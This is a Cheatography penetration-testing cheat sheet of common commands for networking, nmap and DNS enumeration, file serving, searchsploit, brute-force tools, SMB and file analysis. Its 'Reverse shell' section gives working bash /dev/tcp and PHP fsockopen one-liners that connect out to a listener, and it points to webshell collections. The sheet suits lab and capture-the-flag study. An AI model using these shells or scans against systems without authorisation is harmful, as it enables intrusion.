Cheatography
https://cheatography.com

Basic networking
Show IP configuration | ip a s
DNS lookup | dig host-name.com
DNS reverse lookup | dig -x 10.10.10.12
Look up DNS entries for a host or IP | nslookup google.com
IP for hostname | host google.com

HTTP download
Using curl | curl http://host:8080/file.sh -o output.sh
Using wget | wget http://host:8080/file.sh

Enumeration
Portscan (first 10000 ports) | nmap -sC -sV 10.10.10.12
Portscan (all ports) | nmap -p- -sV 10.10.10.12
Portscan (UDP) | nmap -sU 10.10.10.12
Gobuster
Dirb
WordPress enumeration
Website technology enumeration
DNS enumeration | dnsrecon -d google.com -n 10.10.10.12
DNS zone transfer | dnsrecon -t axfr -d zonetransfer.me
List subdomains | sublist3r -d target-host.com
Wordlists can be found at /usr/share/wordlists/dirbuster/

Find target in network
Read out ARP cache | ip neigh
Nmap host discovery | nmap -sn 10.10.10.0/24
TCP scan | nmap -Pn 10.10.10.0/24

Serving own data
Python2 webserver (current folder) | python -m SimpleHTTPServer 8080
Python3 webserver (current folder) | python3 -m http.server 8080
Listen on port | nc -lvnp 8080

Exploit DB
Search for exploit | searchsploit apache
View exploit | searchsploit -x path/to/exploit
Copy exploit to current directory | searchsploit -m path/to/exploit

Brute forcing
Brute-force websites (e.g. login) | hydra
Brute-force website paths | wfuzz
Crack files | john
Check each man page to find the detailed command parameters.

Server Message Block (SMB)
SMB enumeration tool | smbmap -H 10.10.10.12
SMB network browser | smbtree
SMB client | smbclient //10.10.10.12/

Useful commands
Change directory | cd folder
Create directory | mkdir foldername
Delete file | rm file.jpg
Delete folder | rm -r folder
Search string in file | grep pattern file.txt
Find file in a folder | find /path -name "*.xml"
Edit file (vi) | vi file.txt

Reverse shell
Bash | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PHP | $sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");
Other webshells can be found at /usr/share/webshells/

File analysis
What is this file? | file unknown.x
Is there something hidden? | binwalk file.png
Extract hidden content | binwalk -e file.png

Encoding/Decoding
Text to base64 | echo -n "text" | base64
base64 to text | echo -n "dGV4dA==" | base64 -d
Hex editor | xxd